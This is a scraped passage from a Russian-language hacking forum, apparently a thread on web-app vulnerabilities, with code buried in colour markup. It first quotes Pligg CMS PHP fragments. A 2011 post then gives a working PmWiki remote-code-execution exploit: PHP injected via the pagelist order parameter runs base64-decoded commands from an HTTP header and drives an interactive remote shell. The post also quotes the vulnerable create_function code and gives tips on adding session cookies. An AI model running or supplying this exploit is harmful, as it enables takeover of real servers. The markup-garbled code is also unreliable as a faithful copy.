if ([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"])!==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#DD0000"]/header.tpl"[/COLOR][COLOR="#007700"]))
[/COLOR][COLOR="#0000BB"]$templates[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'templates'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$templates[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'current_template'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Allow_User_Change_Templates'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]Allow_User_Change_Templates[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_set'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// check for redirects
[/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#0000BB"]mnminclude[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'redirector.php'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]redirector[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location:[/COLOR][COLOR="#0000BB"]$my_pligg_base[/COLOR][COLOR="#DD0000"]/404error.php"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// $main_smarty->assign('tpl_center', '404error');
// $main_smarty->display($the_template . '/pligg.tpl');
[/COLOR][COLOR="#007700"]die();
}
[/COLOR][COLOR="#FF8000"]// Hide private group stories
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]link_group_id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$privacy[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT group_privacy FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]table_groups[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE group_id =[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]link_group_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$privacy[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'private'[/COLOR][COLOR="#007700"]&& ![/COLOR][COLOR="#0000BB"]isMember[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]link_group_id[/COLOR][COLOR="#007700"]))
{
die([/COLOR][COLOR="#DD0000"]'Access denied'[/COLOR][COLOR="#007700"]);
}
}
if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'process'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'process'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){
if ([/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'process'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"])==[/COLOR][COLOR="#DD0000"]'newcomment'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]check_referrer[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$vars[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]author[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'link_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]check_actions[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'comment_subscription'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vars[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]insert_comment[/COLOR][COLOR="#007700"]();
}
}
[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$requestID[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]is_numeric[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){[/COLOR][COLOR="#0000BB"]$requestTitle[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]);}
[/COLOR][COLOR="#FF8000"]// if we're using "Friendly URL's for categories"
[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){[/COLOR][COLOR="#0000BB"]$thecat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT category_id FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]table_categories[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE `category_safe_name` = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]escape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]urlencode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]))).[/COLOR][COLOR="#DD0000"]"';"[/COLOR][COLOR="#007700"]);}
if([/COLOR][COLOR="#0000BB"]$requestID[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]enable_friendly_urls[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#FF8000"]// if we're using friendly urls, don't call /story.php?id=XX or /story/XX/
// this is to prevent google from thinking it's spam
// more work needs to be done on this
[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Link[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$requestID[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]() ==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]|| ([/COLOR][COLOR="#0000BB"]$thecat[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]category[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$thecat[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location:[/COLOR][COLOR="#0000BB"]$my_pligg_base[/COLOR][COLOR="#DD0000"]/404error.php"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// $main_smarty->assign('tpl_center', '404error');
// $main_smarty->display($the_template . '/pligg.tpl');
[/COLOR][COLOR="#007700"]die();
}
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getmyurl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"storyURL"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]category_safe_name[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]category[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]urlencode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]title_url[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]Header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP/1.1 301 Moved Permanently"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]Header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
die();
}
[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// AFFERO GENERAL PUBLIC LICENSE is also included in the file called "COPYING".
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]str_ends_with[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$haystack[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$needle[/COLOR][COLOR="#007700"]) {
return ([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$haystack[/COLOR][COLOR="#007700"], -[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$needle[/COLOR][COLOR="#007700"]) ) ===[/COLOR][COLOR="#0000BB"]$needle[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]$needle[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]/* If the URL is too verbose (specifying index.php or page 1), then, of course
* we just want the main page, which defaults to page 1 anyway. */
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]parse_url[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]]);
if ([/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'index.php'[/COLOR][COLOR="#007700"]) !==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]|| ( isset ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP/1.1 301 Moved Permanently"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'page=1'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: ./"[/COLOR][COLOR="#007700"].([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] ?[/COLOR][COLOR="#DD0000"]'?'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]));
exit;
}
elseif ([/COLOR][COLOR="#0000BB"]str_ends_with[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'/page/1'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]str_ends_with[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'/page/1/'[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP/1.1 301 Moved Permanently"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: ../"[/COLOR][COLOR="#007700"].([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] ?[/COLOR][COLOR="#DD0000"]'?'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]));
exit;
}
[/COLOR][/COLOR]
|
|
|
|
27.11.2011, 19:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
[B][COLOR="Yellow"]PmWiki
Exploit:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] \n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\nExample....: php[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]localhost /"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\nExample....: php[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]localhost /pmwiki/\n"[/COLOR][COLOR="#007700"];
die();
}
[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$phpcode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"']);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD]));print(___);die;#"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$payload[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"action=edit&post=save&n=Cmd.Shell&text=(:pagelist order=[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$phpcode[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]:)"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"POST[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]pmwiki.php HTTP/1.0\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Host:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Length: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$payload[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: application/x-www-form-urlencoded\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Connection: close\r\n\r\n[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$payload[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
if (![/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/Location/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]http_send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]))) die([/COLOR][COLOR="#DD0000"]"\n[-] Edit password required?!\n"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"POST[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]pmwiki.php HTTP/1.0\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Host:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Cmd: %s\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Length: 11\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: application/x-www-form-urlencoded\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Connection: close\r\n\r\nn=Cmd.Shell"[/COLOR][COLOR="#007700"];
while([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
{
print[/COLOR][COLOR="#DD0000"]"\npmwiki-shell# "[/COLOR][COLOR="#007700"];
if (([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]STDIN[/COLOR][COLOR="#007700"]))) ==[/COLOR][COLOR="#DD0000"]"exit"[/COLOR][COLOR="#007700"]) break;
[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http_send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]base64_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"])));
[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/\n\r\n(.*)___/s"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]) ? print[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] : die([/COLOR][COLOR="#DD0000"]"\n[-] Exploit failed!\n"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
Уязвимый код:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
foreach([/COLOR][COLOR="#0000BB"]$opt[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'=order'[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]) {
if (@[/COLOR][COLOR="#0000BB"]$PageListSortCmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"\$c =[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$PageListSortCmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]; "[/COLOR][COLOR="#007700"];
else
[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"\$c = @strcasecmp(\$PCache[\$x]['[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#DD0000"]'],\$PCache[\$y]['[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#DD0000"]']); "[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"if (\$c) return[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#DD0000"]\$c;\n"[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]StopWatch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PageListSort sort'[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]uasort[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$list[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]create_function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'$x,$y'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"global \$PCache;[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#DD0000"]return 0;"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]StopWatch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PageListSort end'[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
P.S. Без авторизации проходит только на нескольких сайтах, а в остальных нужно авторизоватся и добавить в пакет ваш User-Agent и Cookie. Т.е.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"User-Agent: bla-bla\r\n"[/COLOR][COLOR="#007700"];
